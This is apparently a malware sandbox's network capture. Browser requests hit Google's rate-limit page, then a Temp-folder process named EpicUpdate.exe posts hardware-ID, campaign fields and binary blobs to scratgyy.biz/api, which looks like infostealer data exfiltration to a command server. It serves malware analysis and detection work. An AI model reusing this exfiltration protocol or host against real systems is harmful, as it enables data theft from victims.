2024-10-27 16:04:38 UTC	47	IN	Data Raw: 6b 56 55 58 30 31 46 55 31 4e 42 52 30 56 61 41 55 4d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: kVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49751	142.251.40.100	443	2768	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:37 UTC	553	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-10-27 16:04:38 UTC	763	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGJXJ-bgGIjAxADqPFati6aNWAS11l0vMQ8zDUJeVR1-nuFIhNKu_EJhp1U7fbLuAmb4KubHNeo0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIlsn5uAYQ-uahgQESBL9gluU Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Sun, 27 Oct 2024 16:04:38 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-27 16:04:38 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49752	142.251.40.100	443	2768	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:38 UTC	901	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGJXJ-bgGIjBjKah9wGrJMTTp-NeylW3cNWLLiDs2v6zWNsaZdGDgstSYwTKUqhP1c1YJbAnaRSgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-10-27 16:04:38 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sun, 27 Oct 2024 16:04:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-27 16:04:38 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-10-27 16:04:38 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 43 56 5a 69 4c 5a 48 4e 46 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="CVZiLZHNF
2024-10-27 16:04:38 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49754	142.251.40.100	443	2768	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:38 UTC	727	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGJXJ-bgGIjAxADqPFati6aNWAS11l0vMQ8zDUJeVR1-nuFIhNKu_EJhp1U7fbLuAmb4KubHNeo0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-10-27 16:04:38 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sun, 27 Oct 2024 16:04:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-27 16:04:38 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-10-27 16:04:38 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 43 61 48 52 36 35 61 71 67 79 43 30 53 6a 4a 43 6f 35 57 56 66 48 71 73 61 32 59 76 6c 6a 6c 47 41 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="CaHR65aqgyC0SjJCo5WVfHqsa2YvljlGA
2024-10-27 16:04:38 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49766	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:53 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 704 Host: scratgyy.biz
2024-10-27 16:04:53 UTC	704	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:53 UTC	1010	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mtfshqv1u7p5icrrmc4phr33po; expires=Thu, 20 Feb 2025 09:51:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j4AiqALfvHGnezMVk6Y%2BOKSHJ48WoyMHH3OdZA3zw%2BCCBdfzdxTxW0t291Sk%2FynFiFX115Id6DSmyZ7HymZyBMCIEWwq1RECN3RtmbYD7Tntfa%2BoXwl9%2BN19LzCAKOY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93eca8eb490f37-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=101041&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1616&delivery_rate=35748&cwnd=252&unsent_bytes=0&cid=2c842a7dd504c6b1&ts=521&x=0"
2024-10-27 16:04:53 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 39 0d 0a Data Ascii: 11ok 191.96.150.229
2024-10-27 16:04:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49767	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:53 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 21263 Host: scratgyy.biz
2024-10-27 16:04:53 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:53 UTC	5932	OUT	Data Raw: a1 5f 5a 8c ed d0 a6 b9 de a8 ad cc 8e af 6e 56 3d 57 26 a6 6a 69 34 5c a7 1d a8 e3 95 cb c4 89 da 1b ad d2 14 59 55 cf 60 f1 e9 71 51 b5 12 21 17 6b 72 d5 32 74 b5 16 23 63 28 34 d4 0a 8d ad a4 c7 26 d7 37 80 5b f6 42 56 54 15 c3 25 b6 c9 22 a5 89 e9 a4 50 af b0 7c 85 d3 e7 10 c5 56 b7 99 13 8d 9e c6 52 55 6c a5 12 9b a5 58 ff 76 80 b1 be 26 d9 93 69 4d 8a 44 e8 e7 65 57 77 f4 78 cd 4b 81 3e 4a b6 55 91 69 61 d6 64 a5 aa c7 09 ea 8e ac a8 ae be 4b e2 3c 1d 57 b1 a9 06 68 82 d4 9d 78 bd 4b c4 a4 95 46 3d 42 f3 52 89 a6 c6 b3 7b 4b e5 eb af 9c 13 c4 b9 39 be 3e 1b 32 e8 db 65 52 3a d6 f1 9b 31 86 7c bb 4d 51 27 1a f1 4d b0 59 9d e7 b8 cc 78 2a bb 2f 00 5e 14 5c ff 07 00 00 00 d2 07 f6 ff 01 00 00 80 f4 91 63 1f 18 ff 01 00 00 80 54 81 f1 1f 00 00 00 48 1f Data Ascii: _ZnV=W&ji4\YU`qQ!kr2t#c(4&7[BVT%"P\|VRUlXv&iMDeWwxK>JUiadK<WhxKF=BR{K9>2eR:1\|MQ'MYx*/^\cTH
2024-10-27 16:04:54 UTC	1006	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s7b77kajphog3iedjuqnqaf0h2; expires=Thu, 20 Feb 2025 09:51:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DePmjyjzITvLpi88CHkui6oKTKoY26EqMUQSLsO8yYrumhi60SZgMhmM1B6aJCCb1WXIOiDQ7Tdo9SYZWWoPX7LQeeEQmAofEOFJ4hte4wKcThM4KiVV%2B%2FOrq9m7VmE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecacb8747c96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94462&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2828&recv_bytes=22221&delivery_rate=40440&cwnd=247&unsent_bytes=0&cid=50d9b248575f6650&ts=498&x=0"
2024-10-27 16:04:54 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 39 0d 0a Data Ascii: 11ok 191.96.150.229
2024-10-27 16:04:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49768	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:54 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 10942 Host: scratgyy.biz
2024-10-27 16:04:54 UTC	10942	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 45 38 31 45 31 45 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6CE81E1EB129FD4CDB71E32F12885CB3--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"QxiMJI--REDLI
2024-10-27 16:04:55 UTC	1009	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ir96o2gsq55j1ghcce2bidbdqu; expires=Thu, 20 Feb 2025 09:51:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obCpVdQspuQEXGmI3asPoS52xX5uNSkatbiowhX%2BSF3nd83WUp4L4R6ur9M1gjwm8zwvbjm1NsZ81Bvp6ZtL0o%2BbbFHbXiJM7bnJLeHnDqLrIVdOOPr956Jq9QX%2Bi%2B0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ecb12aa5726b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94128&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2826&recv_bytes=11878&delivery_rate=40631&cwnd=252&unsent_bytes=0&cid=154ee5d127710d55&ts=492&x=0"
2024-10-27 16:04:55 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 39 0d 0a Data Ascii: 11ok 191.96.150.229
2024-10-27 16:04:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49769	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:55 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20571 Host: scratgyy.biz
